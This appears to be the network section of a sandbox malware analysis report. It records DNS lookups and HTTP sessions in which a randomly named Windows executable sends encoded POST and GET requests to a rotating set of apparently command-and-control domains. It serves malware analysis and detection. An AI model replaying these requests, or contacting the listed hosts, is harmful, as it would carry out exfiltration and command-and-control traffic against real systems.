Nov 13, 2024 15:37:08.875526905 CET | 192.168.2.5 | 1.1.1.1 | 0x6808 | Standard query (0) | www.sankan-fukushi.info | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:37:22.897605896 CET | 192.168.2.5 | 1.1.1.1 | 0xe119 | Standard query (0) | www.rtpwslot888gol.sbs | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 13, 2024 15:34:06.080240965 CET | 1.1.1.1 | 192.168.2.5 | 0xac8c | No error (0) | www.bahaeng.com |  | 185.134.245.113 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:34:22.648819923 CET | 1.1.1.1 | 192.168.2.5 | 0xcf87 | No error (0) | www.atendefacil.info |  | 208.115.225.220 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:34:36.255896091 CET | 1.1.1.1 | 192.168.2.5 | 0x9802 | No error (0) | www.sklad-iq.online |  | 194.58.112.174 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:34:51.361541986 CET | 1.1.1.1 | 192.168.2.5 | 0x3af6 | No error (0) | www.mdpc7.top | mmd.dnsmmd.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 13, 2024 15:34:51.361541986 CET | 1.1.1.1 | 192.168.2.5 | 0x3af6 | No error (0) | mmd.dnsmmd.com |  | 20.2.36.112 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:34:51.361541986 CET | 1.1.1.1 | 192.168.2.5 | 0x3af6 | No error (0) | mmd.dnsmmd.com |  | 20.2.113.172 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:35:05.299642086 CET | 1.1.1.1 | 192.168.2.5 | 0xe0f3 | No error (0) | www.ecojomos.xyz |  | 203.161.46.205 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:35:20.225814104 CET | 1.1.1.1 | 192.168.2.5 | 0xd3c9 | No error (0) | www.717hy.net |  | 68.66.226.92 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:35:33.719866991 CET | 1.1.1.1 | 192.168.2.5 | 0x36f8 | No error (0) | www.mrpokrovskii.pro |  | 109.70.26.37 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:35:33.719866991 CET | 1.1.1.1 | 192.168.2.5 | 0x36f8 | No error (0) | www.mrpokrovskii.pro |  | 194.85.61.76 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:35:50.173671007 CET | 1.1.1.1 | 192.168.2.5 | 0xbea7 | No error (0) | www.7vh2wy.top |  | 20.2.249.7 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:35:50.173726082 CET | 1.1.1.1 | 192.168.2.5 | 0xbea7 | No error (0) | www.7vh2wy.top |  | 20.2.249.7 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:35:50.173754930 CET | 1.1.1.1 | 192.168.2.5 | 0xbea7 | No error (0) | www.7vh2wy.top |  | 20.2.249.7 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:36:04.190411091 CET | 1.1.1.1 | 192.168.2.5 | 0x2aa0 | No error (0) | www.lsfanarolt.shop |  | 172.67.197.57 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:36:04.190411091 CET | 1.1.1.1 | 192.168.2.5 | 0x2aa0 | No error (0) | www.lsfanarolt.shop |  | 104.21.60.137 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:36:17.951235056 CET | 1.1.1.1 | 192.168.2.5 | 0x36bb | No error (0) | www.129glenforest.com | domains-38.cribflyer.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 13, 2024 15:36:17.951235056 CET | 1.1.1.1 | 192.168.2.5 | 0x36bb | No error (0) | domains-38.cribflyer.com |  | 50.18.131.220 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:36:17.951235056 CET | 1.1.1.1 | 192.168.2.5 | 0x36bb | No error (0) | domains-38.cribflyer.com |  | 52.9.60.8 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:36:31.757040024 CET | 1.1.1.1 | 192.168.2.5 | 0x66e3 | Server failure (2) | www.joube.shop | none | none | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:36:40.134289980 CET | 1.1.1.1 | 192.168.2.5 | 0x17a2 | No error (0) | www.madhf.tech |  | 103.224.182.242 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:36:54.445348978 CET | 1.1.1.1 | 192.168.2.5 | 0xbf77 | No error (0) | www.grandesofertas.fun | entri-domains.clickmax.io |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 13, 2024 15:36:54.445348978 CET | 1.1.1.1 | 192.168.2.5 | 0xbf77 | No error (0) | entri-domains.clickmax.io | ssl.goentri.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 13, 2024 15:36:54.445348978 CET | 1.1.1.1 | 192.168.2.5 | 0xbf77 | No error (0) | ssl.goentri.com |  | 76.223.74.74 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:36:54.445348978 CET | 1.1.1.1 | 192.168.2.5 | 0xbf77 | No error (0) | ssl.goentri.com |  | 13.248.221.243 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:37:08.931442022 CET | 1.1.1.1 | 192.168.2.5 | 0x6808 | No error (0) | www.sankan-fukushi.info |  | 163.44.185.183 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:37:08.931499004 CET | 1.1.1.1 | 192.168.2.5 | 0x6808 | No error (0) | www.sankan-fukushi.info |  | 163.44.185.183 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:37:22.938776016 CET | 1.1.1.1 | 192.168.2.5 | 0xe119 | No error (0) | www.rtpwslot888gol.sbs |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 15:37:22.938776016 CET | 1.1.1.1 | 192.168.2.5 | 0xe119 | No error (0) | www.rtpwslot888gol.sbs |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49950 | 185.134.245.113 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
Timestamp | Bytes transferred | Direction | Data
Nov 13, 2024 15:34:06.118314981 CET | 440 | OUT | GET /7d81/?tXul=U2UloNhP&2J=rKnERuK87XwUpD46DfVgxrQvP3X7K9CGfDS22ViQ9f8p4xS2+clAvvHEJpZ8brBpsNS/kiukCkSqLcZJlXQs2/1YcKhhRt4ykNxCPrZ76z98Hxh/ipFlCU6POWu6VKl5iw== HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Host: www.bahaeng.com
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
Nov 13, 2024 15:34:06.956535101 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:34:06 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Expires: Wed, 13 Nov 2024 15:34:06 GMT
                                                                                  Cache-Control: max-age=3600
                                                                                  Cache-Control: public
                                                                                  Data Ascii: 14fd<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <script src="/punycode.min.js"></script> <title>www.bahaeng.com is parked</title> <style> * { margin: 0; padding: 0; } body { background: #ccc; font-family: Arial, Helvetica, sans-serif; font-size: 11pt; text-align: center; } h1 { margin: 10px auto 20px 10px; color: #3498db; } p { display: inline-block; min-width: 200px; margin: auto 30px 10px 30px; } .container { position: relative; text-align: left; min-height: 200px; max-width: 800px; min-width: 450px; margin: 15% auto 0px auto; background: #ffffff; border-radius: 20px; padding: 20px; box-sizing: border-box; } img.logo {


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49983 | 208.115.225.220 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
Timestamp | Bytes transferred | Direction | Data
Nov 13, 2024 15:34:22.670736074 CET | 712 | OUT | POST /ovl0/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.atendefacil.info
                                                                                  Origin: http://www.atendefacil.info
                                                                                  Referer: http://www.atendefacil.info/ovl0/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Ascii: 2J=hwzrur+12bJrC8f27KHLvyCdwI/5mR/bkbXgstYrX0q9wY0LJFZilPlK3lCCeKkCER8w3kM5L3YOCQWO5EZBWb/mhuPTqAuCP1iKBIl0Gukzh78DlZDhAm2A88L1vTMytt8AxdbP5qQOulAxS+OEyrM+OBmvYcUpKLzHMZHwnxjYzZJDSFJEfmiixfln9hY/FqzAhXM=
Nov 13, 2024 15:34:23.994396925 CET | 481 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:34:23 GMT
                                                                                  Server: Apache/2
                                                                                  Content-Length: 315
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                                                                  Nov 13, 2024 15:34:23.994760036 CET | 481 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:34:23 GMT
                                                                                  Server: Apache/2
                                                                                  Content-Length: 315
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                                                                  Nov 13, 2024 15:34:23.999409914 CET | 481 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:34:23 GMT
                                                                                  Server: Apache/2
                                                                                  Content-Length: 315
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  2 | 192.168.2.5 | 49984 | 208.115.225.220 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:34:25.223632097 CET | 732 | OUT | POST /ovl0/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.atendefacil.info
                                                                                  Origin: http://www.atendefacil.info
                                                                                  Referer: http://www.atendefacil.info/ovl0/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Ascii: 2J=hwzrur+12bJrBdv2+sPLtSCcuY/5vx+ckbrgsooCXHe9w6sLIHhiiPlKvVCHRqkFER4S3lw5L3cOCRmO63xGXL/44ePRkguCP1iKBIxeGu8zhIUDm4DiNG2H/8L1rTN7tt8+xfvh5ooOukwxSs2blbMCTRnwS8FdG4KIOq30wwGh7P4pInBsMGOahMtQsR5WfJjw/AYdjW88E+FM2xYuI6izeEKh
                                                                                  Nov 13, 2024 15:34:25.924294949 CET | 481 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:34:25 GMT
                                                                                  Server: Apache/2
                                                                                  Content-Length: 315
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  3 | 192.168.2.5 | 49985 | 208.115.225.220 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:34:27.778934002 CET | 1749 | OUT | POST /ovl0/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.atendefacil.info
                                                                                  Origin: http://www.atendefacil.info
                                                                                  Referer: http://www.atendefacil.info/ovl0/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Nov 13, 2024 15:34:28.432128906 CET | 481 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:34:28 GMT
                                                                                  Server: Apache/2
                                                                                  Content-Length: 315
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  4 | 192.168.2.5 | 49986 | 208.115.225.220 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:34:30.328169107 CET | 445 | OUT | GET /ovl0/?2J=sybLtbK8r4s7cIP4xvr2i1/OgqOaozXkrfvLrO0saE7+04sBLyNlnPJsxyiJd448I0Eq3D8MalhBXQ7UwGRoDb3Yk8LIhQCUInzvAK5ePNY01KNz5a/RKEGS8umzny51vQ==&tXul=U2UloNhP HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Host: www.atendefacil.info
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Nov 13, 2024 15:34:30.968936920 CET | 481 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:34:30 GMT
                                                                                  Server: Apache/2
                                                                                  Content-Length: 315
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  5 | 192.168.2.5 | 49987 | 194.58.112.174 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:34:36.275343895 CET | 709 | OUT | POST /j4lg/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.sklad-iq.online
                                                                                  Origin: http://www.sklad-iq.online
                                                                                  Referer: http://www.sklad-iq.online/j4lg/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Ascii: 2J=5kuOMNAcu67ah2ILTnh5oti+Uh3Hw91Zr5huRGPlo6XU3xq/wsfJ22Bc2fYn/YYwsw2wcYHKSuheY/T3nYwNDXn8m3lGF/vZkCUiT2syVOTV98Q03YU6h8spBCPoe5o//X/WPsQlgpKyP1cvtsJ0gpWWrz6T58JhHnY4NNNpSvhqEvxJuyvCXXPeXAEL10aPf7UiAoE=
                                                                                  Nov 13, 2024 15:34:37.185626030 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:34:37 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  6 | 192.168.2.5 | 49988 | 194.58.112.174 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:34:38.814937115 CET | 729 | OUT | POST /j4lg/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.sklad-iq.online
                                                                                  Origin: http://www.sklad-iq.online
                                                                                  Referer: http://www.sklad-iq.online/j4lg/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Ascii: 2J=5kuOMNAcu67au34LSGh549ixbB3H6d1Cr5tuREj1vIzU3Ty/2YzJx2Bc9/Yi7YYBsw6CcdnKSu1eY+j3npwMBHnEqXlELfvZkCUiT24IVOLV9Mg02687vcsqGCPoa5oz/X+DPptOgrCyPxYvt+h755Wq2D6G3e4pf1UOANYySeVjM5Aj0QnqE3jmHTM8kE7mFYESe/RzgSPKwxW22yQ6fmUGw1Ee
                                                                                  Nov 13, 2024 15:34:39.695214987 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:34:39 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip


                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                  7           192.168.2.5  49989        194.58.112.174  80                3160  C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                                  Nov 13, 2024 15:34:41.756974936 CET  1746               OUT        POST /j4lg/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.sklad-iq.online
                                                                                  Origin: http://www.sklad-iq.online
                                                                                  Referer: http://www.sklad-iq.online/j4lg/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Nov 13, 2024 15:34:42.646076918 CET  1236               IN         HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:34:42 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip


                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                  8           192.168.2.5  49990        194.58.112.174  80                3160  C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                                  Nov 13, 2024 15:34:44.339449883 CET  444                OUT        GET /j4lg/?tXul=U2UloNhP&2J=0mGuP4ABjbamojwwbGp4nd6DYCnF1PU82/RCQVDltajJwR32joy3yBdZ/4cT/JAxhTejF9/1KOpXB+u6q5pZeVP3rEdsFeaB8jVGPWY7QM3+gMMl8rd3lPw1Ny+3a69apQ== HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Host: www.sklad-iq.online
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Nov 13, 2024 15:34:45.236531019 CET  1236               IN         HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:34:45 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Data Ascii: 24f3<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.sklad-iq.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://reg.r [TRUNCATED]


                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                  9           192.168.2.5  49991        20.2.36.112     80                3160  C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                                  Nov 13, 2024 15:34:51.384433031 CET  691                OUT        POST /a4nt/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.mdpc7.top
                                                                                  Origin: http://www.mdpc7.top
                                                                                  Referer: http://www.mdpc7.top/a4nt/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Ascii: 2J=V+G8cRAi19qbp4ocyw5HiwSnESIWs2e60XL3U99AAlVe8Wzujd1CQ3FL3aLuN4K85VKQCjbNiXIeYzV4s7TaR//cy3Ie4m76uAIWWHVlJUWCoReXfAv9dajDtk6CpLhr7OiwHY5KAPkCpkhmAdBTIeyb76Uo4gZVvZ1iZo30dEHW886UvzwPZvZRwZmKbKl8LCD0k1I=
                                                                                  Nov 13, 2024 15:34:52.340709925 CET  336                IN         HTTP/1.1 404 Not Found
                                                                                  Content-Length: 162
                                                                                  Content-Type: text/html;charset=utf-8
                                                                                  Date: Wed, 13 Nov 2024 14:34:52 GMT
                                                                                  Server: nginx
                                                                                  X-Cache: BYPASS
                                                                                  Connection: close
                                                                                  Data Ascii: <html><head> <title>404 Not Found - webman</title></head><body><center> <h1>404 Not Found</h1></center><hr><center>webman</center></body></html>


                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                  10          192.168.2.5  49992        20.2.36.112     80                3160  C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                                  Nov 13, 2024 15:34:53.925340891 CET  711                OUT        POST /a4nt/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.mdpc7.top
                                                                                  Origin: http://www.mdpc7.top
                                                                                  Referer: http://www.mdpc7.top/a4nt/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Ascii: 2J=V+G8cRAi19qboYYc1nFH3ASkPyIWnWe20XX3U85QAR5e80buxM1CT3FL/6LvCYKz5VGYCnHNiXceY2p4sKTZQv/kzHJ42G76uAIWWHRPJQCCpgOXfiHyX6ixqk6CtLhv7OiSHZlgAJgCplRmHI1QGeyRlKVU/DA/ppFrQu6FKGKj0qL+1R4nKP1pgKu9K6EVRhTE6icQ52FOP6sLGgBo0VK/MvkD
                                                                                  Nov 13, 2024 15:34:54.895725012 CET  336                IN         HTTP/1.1 404 Not Found
                                                                                  Content-Length: 162
                                                                                  Content-Type: text/html;charset=utf-8
                                                                                  Date: Wed, 13 Nov 2024 14:34:54 GMT
                                                                                  Server: nginx
                                                                                  X-Cache: BYPASS
                                                                                  Connection: close
                                                                                  Data Ascii: <html><head> <title>404 Not Found - webman</title></head><body><center> <h1>404 Not Found</h1></center><hr><center>webman</center></body></html>


                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                  11          192.168.2.5  49993        20.2.36.112     80                3160  C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                                  Nov 13, 2024 15:34:56.555814028 CET  1728               OUT        POST /a4nt/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.mdpc7.top
                                                                                  Origin: http://www.mdpc7.top
                                                                                  Referer: http://www.mdpc7.top/a4nt/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Nov 13, 2024 15:34:57.504945040 CET  336                IN         HTTP/1.1 404 Not Found
                                                                                  Content-Length: 162
                                                                                  Content-Type: text/html;charset=utf-8
                                                                                  Date: Wed, 13 Nov 2024 14:34:57 GMT
                                                                                  Server: nginx
                                                                                  X-Cache: BYPASS
                                                                                  Connection: close
                                                                                  Data Ascii: <html><head> <title>404 Not Found - webman</title></head><body><center> <h1>404 Not Found</h1></center><hr><center>webman</center></body></html>


                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
